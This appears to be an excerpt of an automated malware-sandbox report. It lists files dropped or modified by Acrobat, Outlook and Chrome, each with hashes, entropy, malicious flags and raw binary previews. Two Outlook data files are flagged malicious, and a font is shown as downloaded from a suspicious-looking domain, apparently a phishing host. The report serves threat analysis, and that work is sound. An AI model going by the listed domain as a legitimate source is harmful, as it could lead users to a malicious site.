                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                    Preview:{"all":[{"id":"DC_Reader_Disc_LHP_Banner","info":{"dg":"36b68acd04e8015a6e0b5ddebce7f7b9","sid":"DC_Reader_Disc_LHP_Banner"},"mimeType":"file","size":289,"ts":1742907844000},{"id":"DC_Reader_Convert_LHP_Banner","info":{"dg":"09256e35c3b049b706c81c3254658f23","sid":"DC_Reader_Convert_LHP_Banner"},"mimeType":"file","size":2129,"ts":1742907843000},{"id":"DC_Reader_Sign_LHP_Banner","info":{"dg":"23dc5526adb12d5d3896897193ff8cd5","sid":"DC_Reader_Sign_LHP_Banner"},"mimeType":"file","size":2028,"ts":1742907843000},{"id":"DC_Reader_Edit_LHP_Banner","info":{"dg":"26201de9aee1f9cc1c577aff6b8f115e","sid":"DC_Reader_Edit_LHP_Banner"},"mimeType":"file","size":2080,"ts":1742907843000},{"id":"DC_Reader_Home_LHP_Trial_Banner","info":{"dg":"8f77e0a8e4ae03c5b494371f0358e3c2","sid":"DC_Reader_Home_LHP_Trial_Banner"},"mimeType":"file","size":295,"ts":1742907843000},{"id":"DC_Reader_Disc_LHP_Retention","info":{"dg":"4862f6b2ab3302b9fe0f773e8d0a3b07","sid":"DC_Reader_Disc_LHP_Retention"},"mimeType":"file",
                                                                                                                                                                                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 23, database pages 3, cookie 0x2, schema 4, UTF-8, version-valid-for 23
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):12288
                                                                                                                                                                                                                                    Entropy (8bit):1.3583333688947359
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:
                                                                                                                                                                                                                                    MD5:935BACE6039BB62E0510E97D623ECA60
                                                                                                                                                                                                                                    SHA1:AAB2FDDC7A348616DAAB0847114B36E6514A4E56
                                                                                                                                                                                                                                    SHA-256:A2F0824C710E3F4C0DD78C1432DA873C0829AC0BC50B0C824B59BBF1C3143CB2
                                                                                                                                                                                                                                    SHA-512:2357A30E4AEE6C5894D3B91E4878F7B8D17B857069E58E6C009716E7946949F7E05EBC81F9AB52F180AC58B7CB8FC149C7CF7CE64C50F5CE5C3F0D259689E191
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                    Preview:SQLite format 3......@ ..........................................................................c.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                                                                                                    File Type:SQLite Rollback Journal
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):8720
                                                                                                                                                                                                                                    Entropy (8bit):1.8282307707233305
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:
                                                                                                                                                                                                                                    MD5:DB25E082BCB3D41F16EA043CC0923F87
                                                                                                                                                                                                                                    SHA1:ABF167E7AD6BF21F0C4F9D9856070CF2E3386027
                                                                                                                                                                                                                                    SHA-256:314577345090BA3A16D89DBA4CC31D5EA26130F244205D73078D77D38FE7E1E5
                                                                                                                                                                                                                                    SHA-512:3140B23BFB6581F7001BADA8CAB03E86473201E5DF75D0617EBD45A1FC8D81963B16F562078368B292F460FC714B7933BF73ECA7034FFD669A30723A682121D1
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                    Preview:.... .c.....VPT.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................v.../.././././.-.-.-.-.-.-.-.-.-.-.-.-.-.-........................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                    Category:modified
                                                                                                                                                                                                                                    Size (bytes):94208
                                                                                                                                                                                                                                    Entropy (8bit):4.485106169924456
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:
                                                                                                                                                                                                                                    MD5:145F722B1566093E7CA1EF8D1298CB65
                                                                                                                                                                                                                                    SHA1:29FECF602492E0393060865E916EFCF02A9CCE17
                                                                                                                                                                                                                                    SHA-256:A0BF16CB2608A4C79D8F2F153249FE74E33B792EC1DA4FB739A1B535E48149A6
                                                                                                                                                                                                                                    SHA-512:180872F58771C4067741C440D23871A61A2D82A0A2157D06017DE15CE39D111D5221CE69463D7A49134716834FDE657204A9568EABA31A7B1904CABAD5E8CE60
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                    Preview:............................................................................d...8...D.../I.>....................eJ..............Zb..2...................................,...@.t.z.r.e.s...d.l.l.,.-.1.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.1.1.1..............................................................3.........../I.>............v.2._.O.U.T.L.O.O.K.:.1.a.4.4.:.9.a.1.3.e.9.3.a.8.9.2.7.4.b.f.0.b.6.0.a.3.9.3.c.9.0.a.7.9.e.8.2...C.:.\.U.s.e.r.s.\.t.o.r.r.e.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.O.u.t.l.o.o.k. .L.o.g.g.i.n.g.\.O.U.T.L.O.O.K._.1.6._.0._.1.6.8.2.7._.2.0.1.3.0.-.2.0.2.5.0.3.2.5.T.0.9.0.3.0.4.0.4.0.1.-.6.7.2.4...e.t.l...........P.P.8...D.../I.>....................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (393)
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):16525
                                                                                                                                                                                                                                    Entropy (8bit):5.359827924713262
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:
                                                                                                                                                                                                                                    MD5:06DEAEDB81D09FD8FB5FF668D8E09CB2
                                                                                                                                                                                                                                    SHA1:28A02BCBD5975117B97A08AFB049F2C94F334726
                                                                                                                                                                                                                                    SHA-256:D98DE785425112A2D7A41B16073812FA4FA4955F2D5139AE87C9A5FBC4717D64
                                                                                                                                                                                                                                    SHA-512:948E3B56E5A8D818A5FE9D74B82A898F7264909ADF2C49E5D096CB90F4D28ED95990545A4857933F0E06D493AA0F6D41F6109C74B44BC0E4B84346B519681936
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                    Preview:SessionID=c98ebd97-9477-4d7e-bd0c-12efa5f01bab.1696586972755 Timestamp=2023-10-06T12:09:32:755+0200 ThreadID=6536 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------".SessionID=c98ebd97-9477-4d7e-bd0c-12efa5f01bab.1696586972755 Timestamp=2023-10-06T12:09:32:756+0200 ThreadID=6536 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found".SessionID=c98ebd97-9477-4d7e-bd0c-12efa5f01bab.1696586972755 Timestamp=2023-10-06T12:09:32:756+0200 ThreadID=6536 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!".SessionID=c98ebd97-9477-4d7e-bd0c-12efa5f01bab.1696586972755 Timestamp=2023-10-06T12:09:32:756+0200 ThreadID=6536 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1".SessionID=c98ebd97-9477-4d7e-bd0c-12efa5f01bab.1696586972755 Timestamp=2023-10-06T12:09:32:756+0200 ThreadID=6536 Component=ngl-lib_NglAppLib Description="SetConfig:
                                                                                                                                                                                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (393), with CRLF line terminators
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):15114
                                                                                                                                                                                                                                    Entropy (8bit):5.3699503089085
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:
                                                                                                                                                                                                                                    MD5:25984133347F446669517CA269C3D2A1
                                                                                                                                                                                                                                    SHA1:C8E8B9941EBC5A57E68CE7E83555B689A29A3562
                                                                                                                                                                                                                                    SHA-256:B072CF6A4E5B510A3A5FA9560C717F7ADA437C0E7CA329D6D200314B42DE7F0B
                                                                                                                                                                                                                                    SHA-512:F6DFAD9D7CF8B8A9BBADBD8221D79A2C1EF4F1A6FD5D970AD3265AF80214B77686FD2D8A68AB8D25368A426E1A04AF4D53DD0E89A84A635E82B5F38D73ACF52F
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                    Preview:SessionID=6834226b-6df3-4934-b993-91b260b545cd.1742907839657 Timestamp=2025-03-25T09:03:59:657-0400 ThreadID=4656 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------"..SessionID=6834226b-6df3-4934-b993-91b260b545cd.1742907839657 Timestamp=2025-03-25T09:03:59:659-0400 ThreadID=4656 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found"..SessionID=6834226b-6df3-4934-b993-91b260b545cd.1742907839657 Timestamp=2025-03-25T09:03:59:659-0400 ThreadID=4656 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!"..SessionID=6834226b-6df3-4934-b993-91b260b545cd.1742907839657 Timestamp=2025-03-25T09:03:59:659-0400 ThreadID=4656 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1"..SessionID=6834226b-6df3-4934-b993-91b260b545cd.1742907839657 Timestamp=2025-03-25T09:03:59:660-0400 ThreadID=4656 Component=ngl-lib_NglAppLib Description="SetConf
                                                                                                                                                                                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):35721
                                                                                                                                                                                                                                    Entropy (8bit):5.425191569909387
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:
                                                                                                                                                                                                                                    MD5:98904B35F31AFFA5996AAFFD4B2316A4
                                                                                                                                                                                                                                    SHA1:1E35C6DE1ECCFD6BCD6212EBA72A3064AE363ED8
                                                                                                                                                                                                                                    SHA-256:F893CF822A8B44202E362696BB3837E19627BAC176654740E9AEB87F8814E65D
                                                                                                                                                                                                                                    SHA-512:39307B93AFC27994D3373B1280D69D990E04C9FDB2C9074EE8F2B128316459547F0297CAC3C9DB7526CCDA862367A40F2B12EF7F48F8E2F0C55EA552BD849132
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                    Preview:06-10-2023 11:44:59:.---2---..06-10-2023 11:44:59:.AcroNGL Integ ADC-4240758 : ***************************************..06-10-2023 11:44:59:.AcroNGL Integ ADC-4240758 : ***************************************..06-10-2023 11:44:59:.AcroNGL Integ ADC-4240758 : ******** Starting new session ********..06-10-2023 11:44:59:.AcroNGL Integ ADC-4240758 : Starting NGL..06-10-2023 11:44:59:.AcroNGL Integ ADC-4240758 : Setting synchronous launch...06-10-2023 11:44:59:.AcroNGL Integ ADC-4240758 ::::: Configuring as AcrobatReader1..06-10-2023 11:44:59:.AcroNGL Integ ADC-4240758 : NGLAppVersion 23.6.20320.6..06-10-2023 11:44:59:.AcroNGL Integ ADC-4240758 : NGLAppMode NGL_INIT..06-10-2023 11:44:59:.AcroNGL Integ ADC-4240758 : AcroCEFPath, NGLCEFWorkflowModulePath - C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1 C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow..06-10-2023 11:44:59:.AcroNGL Integ ADC-4240758 : isNGLExternalBrowserDisabled - No..06-10-2023 11:44:59:.Closing File..06-10-
                                                                                                                                                                                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                                                                                                                                    File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 5111142
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):1419751
                                                                                                                                                                                                                                    Entropy (8bit):7.976496077007677
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:
                                                                                                                                                                                                                                    MD5:B23C3286AD27862D6B38821675D77B12
                                                                                                                                                                                                                                    SHA1:984F93CBD553F67D98AA834C297E4F363765E464
                                                                                                                                                                                                                                    SHA-256:6616A4FAF85BC53AC39EC06D992CF1447C685E4160E9018A60D2DB5FD0160E28
                                                                                                                                                                                                                                    SHA-512:46262813FB80711F5005088E15232B705A6D1803A8346B49121CD813796E59CE9C47AA9721254C45756D32BE4084C5FFC1877CE2EC4ABABCE65526B2D57C67F7
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                    Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.
                                                                                                                                                                                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                                                                                                                                    File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 160932
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):543911
                                                                                                                                                                                                                                    Entropy (8bit):7.977303608379539
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:
                                                                                                                                                                                                                                    MD5:5B21A6981E55EF9576D169BBED44BCDB
                                                                                                                                                                                                                                    SHA1:B3A14100B7E7C2C01D61B010A54937952D111E20
                                                                                                                                                                                                                                    SHA-256:9555E661370D1DC26605DAE88BDBC1ABA68038C769BF6E354A256B1A1C4C110E
                                                                                                                                                                                                                                    SHA-512:FCA72A5131D8780A17DF65BBFF37FBA88DBEA3B7AE991C3D893B21B9E6C1EED44DC12945C8DA39DE471FAC5013BE71D43E5BBB892994742BC33EF5934469B1B1
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                    Preview:...........kWT..0...W`.........b..@..nn........5.._..I.R3I..9g.x....s.\+.J......F...P......V]u......t....jK...C.fD..]..K....;......y._.U..}......S.........7...Q.............W.D..S.....y......%..=.....e..^.RG......L..].T.9.y.zqm.Q]..y..(......Q]..~~..}..q...@.T..xI.B.L.a.6...{..W..}.mK?u...5.#.{...n...........z....m^.6!.`.....u...eFa........N....o..hA-..s.N..B.q..{..z.{=..va4_`5Z........3.uG.n...+...t...z.M."2..x.-...DF..VtK.....o]b.Fp.>........c....,..t..an[............5.1.(}..q.q......K3.....[>..;e..f.Y.........mV.cL...]eF..7.e.<.._.o\.S..Z...`..}......>@......|.......ox.........h.......o....-Yj=.s.g.Cc\.i..\..A.B>.X..8`...P......[..O...-.g...r..u\...k..7..#E....N}...8.....(..0....w....j.......>.L....H.....y.x3...[>..t......0..z.qw..]X..i8..w.b..?0.wp..XH.A.[.....S..g.g..I.A.15.0?._n.Q.]..r8.....l..18...(.].m...!|G.1...... .3.`./....`~......G.............|..pS.e.C....:o.u_..oi.:..|....joi...eM.m.K...2%...Z..j...VUh..9.}.....
                                                                                                                                                                                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                                                                                                                                    File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 33081
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):1407294
                                                                                                                                                                                                                                    Entropy (8bit):7.97605879016224
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:
                                                                                                                                                                                                                                    MD5:A0CFC77914D9BFBDD8BC1B1154A7B364
                                                                                                                                                                                                                                    SHA1:54962BFDF3797C95DC2A4C8B29E873743811AD30
                                                                                                                                                                                                                                    SHA-256:81E45F94FE27B1D7D61DBC0DAFC005A1816D238D594B443BF4F0EE3241FB9685
                                                                                                                                                                                                                                    SHA-512:74A8F6D96E004B8AFB4B635C0150355CEF5D7127972EA90683900B60560AA9C7F8DE780D1D5A4A944AF92B63C69F80DCDE09249AB99696932F1955F9EED443BE
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                    Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.
                                                                                                                                                                                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                                                                                                                                    File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 299538
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):758601
                                                                                                                                                                                                                                    Entropy (8bit):7.98639316555857
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:
                                                                                                                                                                                                                                    MD5:3A49135134665364308390AC398006F1
                                                                                                                                                                                                                                    SHA1:28EF4CE5690BF8A9E048AF7D30688120DAC6F126
                                                                                                                                                                                                                                    SHA-256:D1858851B2DC86BA23C0710FE8526292F0F69E100CEBFA7F260890BD41F5F42B
                                                                                                                                                                                                                                    SHA-512:BE2C3C39CA57425B28DC36E669DA33B5FF6C7184509756B62832B5E2BFBCE46C9E62EAA88274187F7EE45474DCA98CD8084257EA2EBE6AB36932E28B857743E5
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                    Preview:...........kWT..0...W`.........b..@..nn........5.._..I.R3I..9g.x....s.\+.J......F...P......V]u......t....jK...C.fD..]..K....;......y._.U..}......S.........7...Q.............W.D..S.....y......%..=.....e..^.RG......L..].T.9.y.zqm.Q]..y..(......Q]..~~..}..q...@.T..xI.B.L.a.6...{..W..}.mK?u...5.#.{...n...........z....m^.6!.`.....u...eFa........N....o..hA-..s.N..B.q..{..z.{=..va4_`5Z........3.uG.n...+...t...z.M."2..x.-...DF..VtK.....o]b.Fp.>........c....,..t..an[............5.1.(}..q.q......K3.....[>..;e..f.Y.........mV.cL...]eF..7.e.<.._.o\.S..Z...`..}......>@......|.......ox.........h.......o....-Yj=.s.g.Cc\.i..\..A.B>.X..8`...P......[..O...-.g...r..u\...k..7..#E....N}...8.....(..0....w....j.......>.L....H.....y.x3...[>..t......0..z.qw..]X..i8..w.b..?0.wp..XH.A.[.....S..g.g..I.A.15.0?._n.Q.]..r8.....l..18...(.].m...!|G.1...... .3.`./....`~......G.............|..pS.e.C....:o.u_..oi.:..|....joi...eM.m.K...2%...Z..j...VUh..9.}.....
                                                                                                                                                                                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                                                                                                                                    File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1311022
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):386528
                                                                                                                                                                                                                                    Entropy (8bit):7.9736851559892425
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:
                                                                                                                                                                                                                                    MD5:5C48B0AD2FEF800949466AE872E1F1E2
                                                                                                                                                                                                                                    SHA1:337D617AE142815EDDACB48484628C1F16692A2F
                                                                                                                                                                                                                                    SHA-256:F40E3C96D4ED2F7A299027B37B2C0C03EAEEE22CF79C6B300E5F23ACB1EB31FE
                                                                                                                                                                                                                                    SHA-512:44210CE41F6365298BFBB14F6D850E59841FF555EBA00B51C6B024A12F458E91E43FDA3FA1A10AAC857D4BA7CA6992CCD891C02678DCA33FA1F409DE08859324
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                    Preview:...........]s[G. Z...{....;...J$%K&..%.[..k...S....$,.`. )Z..m........a.......o..7.VfV...S..HY}Ba.<.NUVVV~W.].;qG4..b,N..#1.=1.#1..o.Fb.........IC.....Z...g_~.OO.l..g.uO...bY.,[..o.s.D<..W....w....?$4..+..%.[.?..h.w<.T.9.vM.!..h0......}..H..$[...lq,....>..K.)=..s.{.g.O...S9".....Q...#...+..)>=.....|6......<4W.'.U.j$....+..=9...l.....S..<.\.k.'....{.1<.?..<..uk.v;.7n.!...g....."P..4.U........c.KC..w._G..u..g./.g....{'^.-|..h#.g.\.PO.|...]x..Kf4..s..............+.Y.....@.K....zI..X......6e?[..u.g"{..h.vKbM<.?i6{%.q)i...v..<P8P3.......CW.fwd...{:@h...;........5..@.C.j.....a.. U.5...].$.L..wW....z...v.......".M.?c.......o..}.a.9..A..%V..o.d....'..|m.WC.....|.....e.[W.p.8...rm....^..x'......5!...|......z..#......X_..Gl..c..R..`...*.s-1f..]x......f...g...k........g....... ).3.B..{"4...!r....v+As...Zn.]K{.8[..M.r.Y..........+%...]...J}f]~}_..K....;.Z.[..V.&..g...>...{F..{I..@~.^.|P..G.R>....U..../HY...(.z.<.~.9OW.Sxo.Y
                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):163840
                                                                                                                                                                                                                                    Entropy (8bit):0.5070196555218432
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:
                                                                                                                                                                                                                                    MD5:3E22D3FB59FECA6FD85F6FD1A69C6494
                                                                                                                                                                                                                                    SHA1:8B00CCA4FCD30892186EB12EA27F788E4EF35C62
                                                                                                                                                                                                                                    SHA-256:B76EBE2A93AD64DA03A33FA789C5F80D981522E650B9D9471BCEE06975AAC632
                                                                                                                                                                                                                                    SHA-512:771FF8B7E0053663BFC7A18102CAC67D8D4E20B95DA6188346863066F193B7F62D365099BE8121C08E60C58535BD5CEA5795185B9F06304B53D0758AE6859182
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                    Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                                                                                                                                                                                                                    File Type:Microsoft Outlook email folder (>=2003)
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):271360
                                                                                                                                                                                                                                    Entropy (8bit):1.506521053488732
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:
                                                                                                                                                                                                                                    MD5:FB9EC5B4294721F38B82EC320D46D54B
                                                                                                                                                                                                                                    SHA1:A7D323BE03F5681CC3190643561090ABE75F74F7
                                                                                                                                                                                                                                    SHA-256:E5A7FA783A22F787CC9DFA1015DA5972E5BBCB0C0527B3F4B76A23858460053D
                                                                                                                                                                                                                                    SHA-512:36E22FC2C09ADEC42F51B7BBA31FE4D5C8EFA91E8979D488676C23E1D10F099BD6FBA83984AD327CFE2473C2A9220021A410D8CE0F16B29D030F78502CB66C80
                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                    Preview:!BDN....SM......\...H...................[................@...........@...@...................................@...........................................................................$.......D......@:..........................................................................................................................................................................................................................................................................................................................H.......|...^.L.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):131072
                                                                                                                                                                                                                                    Entropy (8bit):0.9463929345323534
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:
                                                                                                                                                                                                                                    MD5:4C31B7D06F179A2AD422270307663B02
                                                                                                                                                                                                                                    SHA1:7308BE55763CA9E5FEEBBEA685E5F035C5EACA61
                                                                                                                                                                                                                                    SHA-256:560D26B948F6C3E20233C535EDC29E76E1D89591922864BE2C51A897572A2DE2
                                                                                                                                                                                                                                    SHA-512:320DD9E3CEB585BBF1637CCFFA36D9D1638B083BC7232913FEA2971169DCD7C32F0D5CD47AD4D65B011C9E16E23F7B716AC715880E60C4DB6F773E674D2BB962
                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                    Preview:.`..C...I.......D...4..>......................#.!BDN....SM......\...H...................[................@...........@...@...................................@...........................................................................$.......D......@:..........................................................................................................................................................................................................................................................................................................................H.......|...^.L.4..>.........B............#.........................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                    File Type:Web Open Font Format (Version 2), TrueType, length 28000, version 1.66
                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                    Size (bytes):28000
                                                                                                                                                                                                                                    Entropy (8bit):7.99335735457429
                                                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                                                    SSDEEP:
                                                                                                                                                                                                                                    MD5:A4BCA6C95FED0D0C5CC46CF07710DCEC
                                                                                                                                                                                                                                    SHA1:73B56E33B82B42921DB8702A33EFD0F2B2EC9794
                                                                                                                                                                                                                                    SHA-256:5A51D246AF54D903F67F07F2BD820CE77736F8D08C5F1602DB07469D96DBF77F
                                                                                                                                                                                                                                    SHA-512:60A058B20FCB4F63D02E89225A49226CCD7758C21D9162D1B2F4B53BBA951B1C51D3D74C562029F417D97F1FCA93F25FDD2BC0501F215E3C1EF076810B54DD06
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                    URL:https://oazh.jyqhucdd.es/GDSherpa-bold.woff2
